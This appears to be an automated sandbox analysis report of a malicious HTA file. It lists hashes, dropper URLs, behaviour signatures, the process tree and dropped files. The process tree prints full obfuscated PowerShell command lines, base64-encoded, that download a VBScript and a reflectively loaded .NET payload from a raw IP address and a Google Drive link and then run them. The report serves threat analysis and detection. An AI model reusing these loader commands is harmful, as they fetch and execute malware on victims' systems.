Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    23-10-2024 06:01

General

  • Target

    greatwayforbestthignswithwhonotwanttodo.hta

  • Size

    130KB

  • MD5

    67a5ad5e7caf5c79cb209e433c345c0b

  • SHA1

    15776cf58dee4ecb7b42b2836539d8d553bf5439

  • SHA256

    5d06cbde318e42ef7e39a6af52d96576aec4f11477101e4c90718f12c09c5eb4

  • SHA512

    b6b697d11dca698441116526bad13c366ba78b477b7489372fff4155a3a06fc49a6487cf2e7a6e33855b7ac7c57dc0c99760a6fe54e77f2b2ec51539a6f5ee96

  • SSDEEP

    192:Ea2xJKbBKWvKbBRWGWiJnKbBxKbBDWNTKbBUT:UWSHWi0yW22

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatwayforbestthignswithwhonotwanttodo.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1504
    • C:\Windows\SysWOW64\WINdOwspoWErSHeLL\V1.0\powERShEll.EXe
      "C:\Windows\SySTeM32\WINdOwspoWErSHeLL\V1.0\powERShEll.EXe" "POWerSHELl.EXE -ex BYPAss -NoP -W 1 -c DeVIcecrEdeNtIalDeploYMent ; IeX($(Iex('[sysTEm.TExt.enCODINg]'+[cHaR]58+[chaR]0x3a+'UTF8.GetStRing([sYStEm.cOnvErT]'+[ChaR]0X3A+[chaR]58+'fromBaSe64sTrIng('+[CHar]34+'JEN3a1ZBMXJLTlgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJlckRFZmlOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTk9rdSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFF2ZVlheCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNxSk9USUEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidGh1RlpYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVTUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEN3a1ZBMXJLTlgxOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80Mi9zaW1wbGV0aGluZ3N3aXRoZ3JlYXRmdXR1cmViZXR0ZXJvbmVnZXRiYWNrZm9ybWUudElGIiwiJEVOdjpBUFBEQVRBXHNpbXBsZXRoaW5nc3dpdGhncmVhdGZ1dHVyZWJldHRlcm9uZWdldGJhLnZicyIsMCwwKTtzdEFSVC1TTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaW1wbGV0aGluZ3N3aXRoZ3JlYXRmdXR1cmViZXR0ZXJvbmVnZXRiYS52YnMi'+[cHar]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2640
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYPAss -NoP -W 1 -c DeVIcecrEdeNtIalDeploYMent
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2796
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hgq9bbh1.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2844
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAE4A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAE49.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2980
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplethingswithgreatfuturebetteronegetba.vbs"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2752
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnZTZvaW1hZ2VVcmwgPSB6U3JodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciB6U3I7ZTZvd2ViQ2xpZW50ID0gTmV3LU9iamVjdCcrJyBTeXN0ZW0uTmV0LldlYkNsaWVudDtlNm9pbWFnZUJ5dGVzID0gZTZvd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShlNm9pbWFnZVVybCk7ZTZvaW1hZ2VUJysnZXh0ID0gW1N5c3RlbS5UJysnZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoZTZvaW1hZ2VCeXRlcyk7ZTZvc3RhcnRGbGFnID0gelNyPDxCQVNFNjRfU1RBUlQ+PnpTcjtlNm9lbmRGbGFnID0gelNyPDxCQVNFNjRfRU5EPj56U3I7ZTZvc3RhcnRJbmRleCA9IGU2b2ltYWdlVGV4dC5JbmRleE9mKGU2b3N0YXJ0RmxhZyk7ZTZvJysnZW5kSW5kZXggPSBlNm9pbWFnZVRleHQuSW5kZXhPZihlNm9lbmRGbGFnKTtlNm8nKydzJysndGFydEluZGV4IC1nZSAwIC1hbmQgZTZvZW5kSW5kZXggLWd0IGU2b3N0YXJ0SW5kZXg7ZTZvc3RhcnRJbmRleCArPSBlNm9zdGFydEZsYWcuTGVuZ3RoO2U2b2Jhc2U2NExlbmd0aCA9IGU2b2VuZEluZGV4IC0gZTZvc3RhJysncnRJbmRleDtlNm9iJysnYXNlNjRDb21tYW5kID0gZTZvaScrJ21hZ2VUZXh0LlN1YnN0cmluZygnKydlNm9zdGFydEluZGV4LCBlNm9iYXNlNjRMZW5ndGgnKycpO2U2b2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKGU2b2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYScrJ3koKSAnKydDcHcgRm9yRWFjaCcrJy1PYmplY3QgeyBlNm9fIH0pWy0xLi4tKGU2b2Jhc2U2NENvbW1hbmQnKycuTCcrJ2VuZ3RoKV07ZTZvY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhlNm9iYXNlNjRSZXZlcnNlZCk7ZTZvbG9hZGUnKydkQXNzZW1ibHkgPSBbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2EnKydkKGU2b2NvbW1hbmRCeXRlcyk7ZTZvdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh6U3JWQUl6U3InKycpO2U2b3ZhaU1ldGhvZC5JbnZvaycrJ2UoZTZvbnVsbCwgQCh6U3J0eHQuVkdGVkJSUy8yNC8nKycxJysnNDEuNjcnKycxLjMuMjkxLy86cCcrJ3R0aHpTciwgeicrJ1NyZGVzYXRpdmFkb3pTciwgeicrJ1NyZGUnKydzJysnYXRpdmFkb3pTciwgelNyZGVzYXRpdmEnKydkb3pTciwgelNyQ2FzUG9selNyLCB6U3JkZXNhdGl2YWRvelNyLCcrJyB6U3JkZXNhdGl2YWRvelNyLHpTcmRlc2EnKyd0aXZhZG96U3IselNyZGVzYXRpdmFkb3pTcix6U3JkZXNhdGl2JysnYScrJ2RvelNyLHpTcmRlc2F0aXZhZG96U3IselNyZGVzYXQnKydpdmFkb3pTcix6U3IxelNyLHpTcmRlc2F0aXZhZG96U3IpKScrJzsnKS1SZXBsYUNFIChbQ0hhcl0xMjIrW0NIYXJdODMrW0NIYXJdMTE0KSxbQ0hhcl0zOSAtY3JFcExhQ0UnZTZvJyxbQ0hhcl0zNi1SZXBsYUNFIChbQ0hhcl02NytbQ0hhcl0xMTIrW0NIYXJdMTE5KSxbQ0hhcl0xMjQpIHwmICggJHBTaE9tZVsyMV0rJHBzSE9tZVszNF0rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2512
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('e6oimageUrl = zSrhttps://drive.google.com/uc?export=downloa'+'d&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zSr;e6owebClient = New-Object'+' System.Net.WebClient;e6oimageBytes = e6owebClient.'+'DownloadData(e6oimageUrl);e6oimageT'+'ext = [System.T'+'ext.Encoding]::UTF8.GetString(e6oimageBytes);e6ostartFlag = zSr<<BASE64_START>>zSr;e6oendFlag = zSr<<BASE64_END>>zSr;e6ostartIndex = e6oimageText.IndexOf(e6ostartFlag);e6o'+'endIndex = e6oimageText.IndexOf(e6oendFlag);e6o'+'s'+'tartIndex -ge 0 -and e6oendIndex -gt e6ostartIndex;e6ostartIndex += e6ostartFlag.Length;e6obase64Length = e6oendIndex - e6osta'+'rtIndex;e6ob'+'ase64Command = e6oi'+'mageText.Substring('+'e6ostartIndex, e6obase64Length'+');e6obase64Reversed = -join (e6obase64Command.ToCharArra'+'y() '+'Cpw ForEach'+'-Object { e6o_ })[-1..-(e6obase64Command'+'.L'+'ength)];e6ocommandBytes = [System.Convert]::FromBase64String(e6obase64Reversed);e6oloade'+'dAssembly = [Syst'+'em.Reflection.Assembly]::Loa'+'d(e6ocommandBytes);e6ovaiMethod = [dnlib.IO.Home].GetMethod(zSrVAIzSr'+');e6ovaiMethod.Invok'+'e(e6onull, @(zSrtxt.VGFVBRS/24/'+'1'+'41.67'+'1.3.291//:p'+'tthzSr, z'+'SrdesativadozSr, z'+'Srde'+'s'+'ativadozSr, zSrdesativa'+'dozSr, zSrCasPolzSr, zSrdesativadozSr,'+' zSrdesativadozSr,zSrdesa'+'tivadozSr,zSrdesativadozSr,zSrdesativ'+'a'+'dozSr,zSrdesativadozSr,zSrdesat'+'ivadozSr,zSr1zSr,zSrdesativadozSr))'+';')-ReplaCE ([CHar]122+[CHar]83+[CHar]114),[CHar]39 -crEpLaCE'e6o',[CHar]36-ReplaCE ([CHar]67+[CHar]112+[CHar]119),[CHar]124) |& ( $pShOme[21]+$psHOme[34]+'x')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1164

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESAE4A.tmp

    Filesize

    1KB

    MD5

    8a1f03435a459a81166ebbe13d365d3f

    SHA1

    c76c6494d54811a76edce2036dddba96b5404c1f

    SHA256

    acb0a83823a8bc43b746e1c420206b70a8b021b87b05b91171375b2c130ba599

    SHA512

    41f64409878256bca8aa57ecc14959893dcd1e01162997a4f37058329b5b45bb1a3826c4296c5befda4e3cfdcd4f6363df9d511225e40d00b2f2b4ce28ca65f2

  • C:\Users\Admin\AppData\Local\Temp\hgq9bbh1.dll

    Filesize

    3KB

    MD5

    2f638fb1eba866d56f423d31451aceb7

    SHA1

    6f1cc200732d1aced11a3f5284f9d60b16214cd8

    SHA256

    2309e54db417200c0389403337645efee17787cc5d5958aeaac1a929df4afed7

    SHA512

    819a38442c6349da4996da547ea4627d91597dd583c449bfd230f056d1597a9eed890ce1e3106b71e76152d20b0158884813e25b41320b837a3cdb2ba0e93e53

  • C:\Users\Admin\AppData\Local\Temp\hgq9bbh1.pdb

    Filesize

    7KB

    MD5

    730303f36c1c128be833bf6234a3a972

    SHA1

    025a7414d4e5b6d4fe1e38fd24261937749e6c89

    SHA256

    d34421800a99463f44a470b48bd8037945302abfbb79a6252458a3d63c0b2f1c

    SHA512

    08ec3777f9895de8868885cd12c59ab622dead4d49984be2f9cde8f33dceb99dc51600d0fdc93302b22c24477f48d9c87a4d210bf805f341f5d737184aec9d37

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    b8f489dc283ce131d151cc023dff59bc

    SHA1

    e81c63d7ff5f9a738ee43290fe0d513b7d3f5b41

    SHA256

    ae1b74f4367e89e8465eac9b8396e93464dcf2fd61ecd76f0c42a7206d78dbbb

    SHA512

    31adb7d75d55a9fe72b30bb74d0d326f2f5b959dda9a009acd61fcd8534ed380981b9f8c57315983701843cbf113680e939faada4aba5fc30b5c442fcfb9234e

  • C:\Users\Admin\AppData\Roaming\simplethingswithgreatfuturebetteronegetba.vbs

    Filesize

    137KB

    MD5

    5a9b34ae3fd1ec59f9be56049cdbc50a

    SHA1

    9a32f9c0054525e2cb7693df834748f8d2960f97

    SHA256

    dadfc399131b08b48b3b2fbcabbcced43397183a41f9213ca046db03258aa3e3

    SHA512

    d951e1def250c743f06e1c6e83a837c43457ce37101ef93db5416efb52db8e49b2ab4998489b2b51dd135d04e4e661bf529c5f5da3b1915358dbfc1959d9ec93

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCAE49.tmp

    Filesize

    652B

    MD5

    ca4592db77543d4f9b3e08d3cfe0c201

    SHA1

    3db05ead44a9f8ef703d53f32ea9daa9ba5d0454

    SHA256

    d81be211b136f1466b37e3077a996919272e5623ca5162ae4d1c71297d69ce90

    SHA512

    f6dc24b309353262b0db0c5ef564df6a3df44f5ef039b696eff26824e31e7b125607278a9dde67bf06f3967ef64113a136e662776299315c401beb0da70a23e1

  • \??\c:\Users\Admin\AppData\Local\Temp\hgq9bbh1.0.cs

    Filesize

    459B

    MD5

    215ff4cb51532af3e78a4f759fc9aa11

    SHA1

    93b2983039e8a5ca1f4fba93f4d239e48ca38b94

    SHA256

    182126a701d9770a97367ac204a3e73a1011c253bc8ec5b83b72fac429595641

    SHA512

    72194a7d39a43d0bc2fbac563b102b28c942cc561e631e35f8324ca54d8d775c529b22eba6655f5fdb65d367e3a864ecc371423e1c2c7e7b62a8b8f7c191fd97

  • \??\c:\Users\Admin\AppData\Local\Temp\hgq9bbh1.cmdline

    Filesize

    309B

    MD5

    bc9fa7f3785f09ee341584ad4c80e23a

    SHA1

    2c890c5ae3138ee02a4c3c4944a8ece79c13b79c

    SHA256

    b37dfbf32a7d694543619b8a006cec5d3785277664833f52da7afd82f2038793

    SHA512

    549ace95b6de70e1ae390e0aec15101bd31edcb09e295e534d19bf899d8eaf8c1564ea8d9b72b280e8c02ee0304af0b65da23c7ad97c4f68d6585638643d46a9